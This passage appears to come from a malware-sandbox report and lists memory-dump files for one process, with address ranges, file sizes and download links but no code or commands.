          5.7MB

          Download
        • memory/2852-26-0x0000000005570000-0x00000000055CC000-memory.dmp
          Filesize

          368KB

          Download
        • memory/2852-64-0x000000006B680000-0x000000006BC2B000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/2852-16-0x0000000002AE0000-0x0000000002B20000-memory.dmp
          Filesize

          256KB

          Download
        • memory/2852-27-0x0000000005520000-0x000000000552A000-memory.dmp
          Filesize

          40KB

          Download
        • memory/2852-28-0x0000000005650000-0x0000000005660000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2852-22-0x0000000002AE0000-0x0000000002B20000-memory.dmp
          Filesize

          256KB

          Download
        • memory/2852-21-0x000000006B680000-0x000000006BC2B000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/2852-43-0x000000006B680000-0x000000006BC2B000-memory.dmp
          Filesize

          5.7MB

          Download